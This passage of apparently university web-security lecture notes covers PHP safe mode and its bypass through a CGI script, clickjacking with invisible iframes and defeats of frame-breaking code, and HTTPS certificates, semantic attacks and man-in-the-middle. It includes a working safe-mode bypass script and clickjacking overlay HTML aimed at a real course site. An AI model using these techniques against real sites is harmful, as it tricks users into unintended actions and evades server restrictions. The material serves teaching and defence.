        symlink, apache_child_terminate, apache_get_modules,
        apache_get_version, apache_getenv, apache_note, apache_setenv,
        parse_ini_file

A function that is considered safe (and not on this list) might actually have some potentially ‘unsafe’ behavior that was not anticipated or known about by the administrator. For example, a wrapper can be used with fopen() to open a stream to a shell.

Also, it is possible that the application might need to use some of the functionality of a blacklisted function. However, safe mode blacklisting is all or nothing.

Restricting functions in Safe Mode

Safe mode provides a degree of separation between different applications, whereby an application that is owned by one user may not access files/etc. on the web server that are owned by a different user.

Restricting a function checks whether the files or directories being operated upon have the same UID (owner) as the script that is being executed, eg,

move_uploaded_file() is permitted only if the owner of the executing script is also the owner of the uploaded file and destination directory.
chdir() is permitted only if the owner of the executing script is also the owner of the new directory.
session_start() is permitted only if the owner of the script is the same as the owner of the session.save_path directory, if the default files session.save_handler is used.
...

However, not all functions can be restricted in this way.

File Access Controls (not just in safe mode)

We can also configure the web server so that an application does not have access to the entire file system.

    open_basedir "/Applications/MAMP"

When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory tree, PHP will refuse to open it. All symbolic links are resolved, so it is not possible to avoid this restriction with a symlink.

Bypass safe mode via CGI scripts

Shared hosting environments typically offer more than just PHP hosting; for example, they may permit users to also host CGI scripts.

Executing PHP from within a CGI wrapper will let you get around safe mode completely. Create a file called bypass.cgi and put the following inside.

    #!/usr/local/bin/php
    <?php
    echo "Content-type: text/plain\n\n";
    system("echo 'Running PHP outside of safemode!'");
    ?>

Principle of Least Privilege

An entity (application) should have access to only those resources that it needs in order to carry out its function.

Specifying security controls only in terms of what is not permitted is generally dangerous, as any oversight in the policy may lead to a vulnerability that can be exploited by an attacker.

It is considered good practice to think of security in terms of what is permitted, with everything else not permitted. In this case any oversight in the policy results in a denial of access (which can be rectified).

From the PHP site: “The PHP safe mode is an attempt to solve the shared-server security problem.
It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren’t very realistic, many people, especially ISP’s, use safe mode for now.”

Clickjacking

HTML Frames

HTML allows any web site to frame any URL with an IFRAME

    <iframe id="moodle" class="moodle" width=800 height=300
            src="http://csa6.ucc.ie/moodle/course/view.php?id=18"
            scrolling=no></iframe>

Making HTML Frames Invisible

We can make the contents of the iframe invisible; all the links in the page are still active and can be followed.

    <style>
    iframe.moodle{opacity:0;filter:alpha(opacity=0)}
    </style>
    <iframe id="moodle" class="moodle" width=800 height=300
            src="http://csa6.ucc.ie/moodle/course/view.php?id=18"
            scrolling=no></iframe>

Overlaying HTML Frames

We can place things over an HTML frame

    <style>
    span.fakebutton_1{background-color:red;font-weight:bold;font-size:12px;
                      position:absolute;top:333px;left:455px; z-index:-40}
    </style>
    <iframe id="moodle" class="moodle" width=800 height=300
            src="http://csa6.ucc.ie/moodle/course/view.php?id=18"
            scrolling=no></iframe>
    <span class="fakebutton_1"><blink> CK </blink></span>

Clickjacking

Make the frame invisible, place a fake web-page under it and trick the user into clicking on the fake button; the user actually clicks on the button in the invisible overlay frame. (It takes a bit of fiddling to get the fake ‘button’ in the right position on the web-page.)

In the moodle web-page example, a student hosts a web-page (including the invisible frame, CK button, etc.) and tricks Simon into visiting their web-page. Simon then clicks on this button, which in turn enables access to the term test by all students!
    <style>
    span.fakebutton_1{background-color:red;font-weight:bold;font-size:12px;
                      position:absolute;top:333px;left:455px; z-index:-40}
    iframe.moodle{opacity:0;filter:alpha(opacity=0)}
    </style>
    <iframe id="moodle" class="moodle" width=800 height=300
            src="http://csa6.ucc.ie/moodle/course/view.php?id=18"
            scrolling=no></iframe>
    <span class="fakebutton_1"><blink> CK </blink></span>

In practice the attacking web-page should have the button as a part of something ‘useful’.

Clickjacking is also called UI redressing and is the same kind of security problem as CSRF.

The victim interacts with a page that is controlled by the adversary.
The interaction requires the victim to click a given target on the page.
The page includes an iframe which points to the cross-site resource containing the target that the adversary wants to get clicked.
This iframe is made invisible by CSS and moved over the click-target.
By apparently interacting with the page, the victim actually clicks the control on the cross-domain site.

This attack has been used to (unknowingly) turn on the web cam, send a tweet, accept a verification dialogue, install a Facebook application, …

Client side controls

The Firefox plugin NoScript can detect clickjacking attempts.

Primitive Frame Breaking

The most popular way to defend against clickjacking is to include a "frame-breaker" script in each page that should not be framed.

Consider the following snippet intended to defend against clickjacking:

    <script>if (top!=self) top.location.href=self.location.href</script>

This simple frame-breaking script, placed in the victim’s (self) web-page, attempts to prevent the victim’s page from being incorporated into a frame or iframe by forcing the parent (top, possibly the attacker) window to load the current frame’s URL.

This works fine if the victim’s web-page is framed by a single page.

Busting Walmart Frame Breaking

Some sites allow their pages to be framed by their own site.
This is usually done by checking document.referrer:

    if (top.location != location) {
        if (document.referrer && document.referrer.indexOf("walmart.com") == -1) {
            top.location.replace(document.location.href);
        }
    }

This is incorrect: indexOf searches for a substring, and walmart.com is a substring of walmart.com.evil.com. Thus the Walmart page can be framed by an attacker who controls a domain walmart.com.evil.com.

Busting (Single) Frame Breaking

The attacker puts the victim’s web-page within a frame within a frame.

    <iframe src="attacker2.html">
      <iframe src="http://www.victim.com/">
      ...

However, many browsers implement the descendant frame navigation policy: a frame can navigate only its descendants.

In this case the victim’s frame-breaking code (shown earlier), running in the page loaded into the innermost frame, attempts to set parent.location to its own self.location. A security exception is raised, since under the descendant policy the innermost frame cannot navigate its parent frame.

A consequence of the security exception is that the page remains in the innermost frame and is subject to clickjacking.

Facebook Frame Busting

Instead of busting out of its frame, Facebook inserts a gray semi-transparent div that covers all of the content when a profile page is framed.

When the user clicks anywhere on the div, Facebook busts out of the frame.

This allows content to be framed while blocking clickjacking attacks.

The framing code:

    <body style="overflow-x: hidden; border: 0px; margin: 0px;">
    <iframe width="218000px" height="2500px" src="http://facebook.com/"
            frameborder="0" marginheight="0" marginwidth="0">
    </iframe>
    <script> window.scrollTo(10200,0); </script>

The scrollTo function dynamically scrolls to the center of the frame.
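Returning to the flawed referrer check in the Walmart example: the underlying mistake is testing for a substring instead of comparing host names. The sketch below expresses both checks in PHP purely for illustration (the original check runs as JavaScript in the browser). The function names naiveCheck and isSameSite are hypothetical, and treating a missing or malformed referrer as untrusted is an assumption of this sketch.

```php
<?php
// The flawed approach: any URL that merely contains the domain passes.
function naiveCheck(string $referrer, string $domain): bool
{
    return strpos($referrer, $domain) !== false;
}

// Compare host names: accept only $domain itself or a subdomain of it.
function isSameSite(string $referrer, string $domain): bool
{
    $host = parse_url($referrer, PHP_URL_HOST);
    if (!is_string($host) || $host === '') {
        return false; // missing or malformed referrer: treat as untrusted
    }
    $host = strtolower($host);
    $domain = strtolower($domain);
    if ($host === $domain) {
        return true;
    }
    // A subdomain must end with ".<domain>", not just contain the domain.
    $suffix = '.' . $domain;
    return substr($host, -strlen($suffix)) === $suffix;
}

$attacker = 'http://walmart.com.evil.com/page';
var_dump(naiveCheck($attacker, 'walmart.com'));   // substring test is fooled
var_dump(isSameSite($attacker, 'walmart.com'));   // host comparison is not
var_dump(isSameSite('http://www.walmart.com/cart', 'walmart.com'));
```

The host comparison rejects walmart.com.evil.com because its host ends in .evil.com, while still accepting www.walmart.com.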
The (original) Facebook frame busting code:

    if (top != self) {
        window.document.write("<div style='background:black; opacity:0.5; filter:alpha(opacity=50); position:absolute; top:0px; left:0px; width:999px; height:999px; z-index:1000001' onClick='top.location.href=window.location.href'></div>");
    }

This div is positioned at (0,0). However, all of Facebook’s content is centered in the frame. This defence can be defeated by making the enclosing frame sufficiently large so that the center of the frame is outside the dark div area.

Best for now Frame Breaking [OWASP-2011]

Although no completely reliable JavaScript exists (since new attacks surface regularly), a best-for-now snippet is often used:

    <head>
    <style> body { display: none; } </style>
    </head>
    <body>
    <script>
    if (self == top) {
        var theBody = document.getElementsByTagName('body')[0];
        theBody.style.display = "block";
    } else {
        top.location = self.location;
    }
    </script>

Note that this should be used in combination with a secure response header.

Conclusions

Currently, all existing Frame Breaking code can be broken across all browsers.
Server-side generated defenses are on the way ....
Client-side defenses in the browser work: use NoScript (Firefox) or other commercial plugins.

HTTPS

Network Security

An untrusted public network. Problems: Eve eavesdrops on network packets, Eve modifies network packets, Eve injects messages pretending to come from Alice/Bob, ....

Confidentiality - Data cannot be read by unintended recipients;
Integrity - Data cannot be altered without detection;
Authentication - Data attributed to correct originator;

Cryptography

A cryptographic cipher is a pair of Encrypt and Decrypt algorithms such that, given plaintext P, encryption key K1 and decryption key K2,

    D(K2, E(K1, P)) = P

In the absence of knowledge about K2, it must not be feasible to recover P from the ciphertext E(K1, P).
Given P and E(K1, P), it must not be feasible to recover K1.

Note that the plaintext P can be any data, including plain text. We call E(K1, P) the ciphertext.

Symmetric/Secret key cryptography: K1 = K2;
Public key cryptography: K1 ≠ K2

Secure Communication

Bob (browser) wishes to communicate securely with Alice (web server).

If Alice and Bob share a secret symmetric encryption key KAB then

    B → A : E(KAB, message (eg credit card details))

and A can decrypt the message as

    message = D(KAB, E(KAB, message))

A can also use KAB to send data securely to B

    A → B : E(KAB, message)

If B can be sure that the only other principal who knows the secret key KAB is A, then he can feel safe about sending credit card details to the web-server.

However, how do A and B come to share the secret key KAB?

Authentication

Suppose that A has an (encryption) public key KA and a corresponding (decryption) private key KA^-1, where

    D(KA^-1, E(KA, P)) = P

and that A’s public key is widely known.

If B knows that A’s public key is KA then B could first propose a random key KAB and send it securely to A using

    B → A : E(KA, [KAB...])

B knows that the only principal who can discover his proposed secret key KAB is A, since only A knows the private decryption key KA^-1. Therefore, after the above exchange B can be sure that KAB is known only to A (and himself).

This is a very simple example of a secure key exchange protocol: the two parties exchange a series of messages, after which they share a secret symmetric key. It is also a very simple variation of the SSL/TLS protocol.

HTTPS = HTTP + SSL

The HTTPS protocol uses SSL/TLS to establish a shared secret key KAB between a browser B and a web-server A.

Once the key exchange protocol has completed, all subsequent HTTP requests and responses are encrypted using this key.

Public Key Certificates

How does the browser B come to learn that A’s public key is KA?
A public key certificate is a statement that is issued and signed by a trusted third party declaring that a given principal (eg A) owns a given public key (eg KA).

This trusted third party is called a Certification Authority (CA) and the CA uses its own private key to ‘sign’ the certificate. This signature can be confirmed by anyone who knows the CA’s public key.

A browser contains the public keys of a number of well-known CAs. When a browser first connects to a web-server over HTTPS the server sends its certificate, and if it is signed by a CA that the browser recognizes then the browser can continue the protocol and establish the shared key.

    Msg 1  B → A : hello
    Msg 2  A → B : certificate for KA
    Msg 3  B → A : E(KA, [KAB...])
    Msg 4  A → B : E(KAB, success...)

X500 Names for X509 Certificates

We need to be able to uniquely name principals if we are to support universal certificates that bind principals (identities) to their public keys.

X500: A proposed hierarchical naming scheme. The intention was that X500 Distinguished Names can be used to give a guaranteed name for everything in the world!

    C=country, S=state, L=locality, O=organization, OU=organization unit, CN=common name, ...

X500 DNs are used to name principals in X509 certificates.

X509 PKI in Practice

There is no clear plan on how to organize the X500 directory in reality: hierarchical naming suits military and government but does not work for businesses or individuals.

In practice, we have just one hierarchy per organization and/or have many commercial CAs that sign certificates for each other and for other principals such as UCC and for individuals.

How does Alice learn Bob’s public key?

Alice knows and trusts a number of root CAs: eg, verisign.
The route from a CA that Alice trusts to Bob provides a certificate chain.
Some CAs only certify end-principals: note the danger of delegating to a customer’s CA (it must be trusted to delegate).
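The idea of a certificate chain (a route from a CA that Alice trusts down to Bob) can be sketched as a walk over issuer links. This is a toy model under loud assumptions: each "certificate" is reduced to a subject => issuer pair, no signatures are verified, and the function name findChain and the sample principals are hypothetical.

```php
<?php
// Toy model: $certs maps each subject to the principal that signed its
// certificate. A real client must also verify every signature, the validity
// period and the revocation status; none of that is done here.
function findChain(string $subject, array $certs, array $trustedRoots, int $maxDepth = 10): ?array
{
    $chain = [];
    $current = $subject;
    for ($depth = 0; $depth < $maxDepth; $depth++) {
        if (in_array($current, $trustedRoots, true)) {
            $chain[] = $current;       // reached a CA that Alice already trusts
            return $chain;
        }
        if (!isset($certs[$current])) {
            return null;               // nobody has certified this principal
        }
        $chain[] = $current;
        $current = $certs[$current];   // move up to the issuer
    }
    return null;                       // chain too long, or a signing loop
}

// Hypothetical data: Bob is certified by a UCC CA, which is certified by verisign.
$certs = ['Bob' => 'UCC CA', 'UCC CA' => 'verisign'];
$chain = findChain('Bob', $certs, ['verisign']);
echo $chain === null ? "no chain\n" : implode(' <- ', $chain) . "\n";
```

With the sample data the walk ends at verisign, which Alice trusts, so a chain is found; if verisign is removed from the trusted list the function returns null and Bob’s key should not be accepted.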
HTTPS in the Browser

We use the https scheme, as in https://www.foo.bar.com, to indicate a desire for a secure connection from the browser to the web-server.

The secure connection is successful if the certificate is accepted as valid, the web-server demonstrates that it can decrypt the key proposed by the browser, and the Common Name CN in the cert matches the domain in the URL of the request/response. This is a secure authentic connection.

The browser gives an indication if the secure connection is successful.

Don’t embed HTTP content in HTTPS

If a page loads over HTTPS but includes some content that loads over HTTP, then the browser (IE7/Firefox3) does not display the lock and/or gives a warning to the user. (Safari does not detect mixed content.)

However, embedded Flash does not give this warning. Thus, a programmer error

    <embed src=http://www.bank.com/anim.swf>

in an HTTPS web page might be exploitable by an attacker!

→ Check whether this applies to most recent versions of Firefox/IE.

Regardless, to be safe, avoid specifying the protocol in embedded content.

    <embed src=//www.bank.com/anim.swf>

Don’t embed HTTPS content in HTTP

The web page is http; however, its HTML source contains a form

    <form method="post" action="https://onlineservices.wachovia.com/..."

A visitor using http does not know whether they are actually visiting the wachovia.com website or some site masquerading as wachovia.com, and therefore does not know where their login credentials are being sent.

A request to http://wachovia.com should have resulted in a re-direct response to https://wachovia.com where the user can then enter their credentials.

The visitor should be able to ‘see’ that they have a secure connection to the website they expect.

Flaws in the HTML

An old version of https://www.onsale.com used GET for sensitive form attributes; on some early browsers the URL was not secured by SSL (though the contents of the page were). Regardless, it’s best to do a POST.
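The redirect recommended above for pages that collect credentials (answer a plain http request with a re-direct to the https URL) might be sketched in PHP as follows. This is a minimal sketch, not a hardened implementation: the function name httpsRedirectTarget is hypothetical, and building the target from the Host request header is an assumption made for brevity (a deployed site would more safely use its configured host name).

```php
<?php
// Returns the https:// URL to redirect to, or null if the request already
// arrived over HTTPS. $server has the shape of PHP's $_SERVER array.
function httpsRedirectTarget(array $server): ?string
{
    // PHP sets $_SERVER['HTTPS'] to a non-empty value for HTTPS requests
    // (some servers use the literal string 'off' for plain HTTP).
    $isHttps = !empty($server['HTTPS']) && strtolower($server['HTTPS']) !== 'off';
    if ($isHttps) {
        return null;
    }
    $host = $server['HTTP_HOST'] ?? 'localhost';  // assumption: trust the Host header
    $uri  = $server['REQUEST_URI'] ?? '/';
    return 'https://' . $host . $uri;
}

// At the top of a page that collects credentials (skipped on the command line):
if (PHP_SAPI !== 'cli') {
    $target = httpsRedirectTarget($_SERVER);
    if ($target !== null) {
        header('Location: ' . $target, true, 301);
        exit;
    }
}
```

The login form is then only ever rendered on a page where the visitor can see the secure connection indicator before typing anything.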
Many examples of errors in the HTML:

BT once had a web-server with only 40-bit crypto enabled.
Verisign once forgot the ‘s’ in an http reference to a page where the user provided userid/pin.
...

Modern browsers like Firefox provide a range of checks for possible ‘mistakes’. However, it is ultimately the user’s responsibility to ensure that the connection is secure and to the right website.

Semantic Attacks

An attacker registers the website amason.com and obtains a valid certificate that associates their public key with that website. Valid secure connections can be made by the browser to https://www.amason.com.

A browser user might be confused about the domain of https://amazon.com@amason.com/buy.html

Recall the GBK Chinese character set. It includes characters that look like /, ?, . and =.

Attacker owns domain evil.cn and gets a cert for *.evil.cn
Attacker sets up a sub-domain www.bank.com/accounts/login.php?userid=simon.evil.cn
How is the ?u interpreted?

A browser visiting this web-site under https has a valid secure connection to (a subdomain of) evil.cn; however, the user of the browser probably thinks they are visiting www.bank.com.

Extended Validation Certificates

A conventional certificate makes few claims about the true identity of the owner of a website.

An extended validation certificate requires a human lawyer at the CA to validate the identity of the individual requesting the certificate.

These certificates are intended for highly secure connections such as banks.

Look at http://verisign.com and http://paypay.com

Man in the Middle and Elsewhere Attack

Attacker sits between bank.com and user browser. Two variants:

Attacker masquerades as bank.com to user browser. User browser unknowingly connects to attacker via HTTP; attacker connects to bank via HTTPS.
Attacker masquerades as bank.com to user browser. User browser mistakenly connects to attacker via HTTPS; attacker connects to bank via HTTPS.

Problems with accepting invalid certificates

If the browser user is naive and is willing to accept invalid certificates then the browser user will be subject to a man-in-the-middle attack.

Suppose that a malicious third party (bunk.com) resides on the connection between the browser and a web-server.

The browser sends an https connect request to bank.com. This is intercepted by the man in the middle, who passes the request on to bank.com.

The man in the middle responds to the browser, masquerading as bank.com but with an invalid certificate (issued to bunk.com).

The browser warns the user that the certificate is invalid, as its Common Name CN does not match that of the URL (bank.com) that the user is requesting.

If the user accepts the invalid certificate then the man in the middle has a secure connection to the user and a secure connection to the bank, and can relay (and read/modify) data sent between the user browser and the bank.
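The name check that produces the browser warning in the scenario above can be sketched in two steps: work out which host a URL really points at, then compare it with the name in the certificate. This is a simplified illustration, not the full matching rules a browser applies; the function names urlHost and certNameMatches are hypothetical, and the wildcard handling (one left-most label only) is an assumption of this sketch.

```php
<?php
// The host the browser will actually connect to. Anything before '@' in the
// authority part is user information, not the host.
function urlHost(string $url): ?string
{
    $host = parse_url($url, PHP_URL_HOST);
    return is_string($host) ? strtolower($host) : null;
}

// Simplified name check: exact match, or a certificate name of the form
// "*.example.com" whose wildcard stands for exactly one left-most label.
function certNameMatches(string $host, string $certName): bool
{
    $host = strtolower($host);
    $certName = strtolower($certName);
    if (substr($certName, 0, 2) === '*.') {
        $dot = strpos($host, '.');
        return $dot !== false && substr($host, $dot) === substr($certName, 1);
    }
    return $host === $certName;
}

// The semantic attack: the real host is amason.com, not amazon.com.
echo urlHost('https://amazon.com@amason.com/buy.html'), "\n";

// The man in the middle presents a certificate issued to bunk.com.
var_dump(certNameMatches(urlHost('https://bank.com/login'), 'bunk.com'));

// A wildcard certificate for *.evil.cn is valid for any direct subdomain.
var_dump(certNameMatches('simon.evil.cn', '*.evil.cn'));
```

The second check fails, which corresponds to the warning the browser shows; the attack succeeds only if the user overrides that warning. The third check succeeds, which is why a valid padlock alone does not tell the user they are talking to the site they expect.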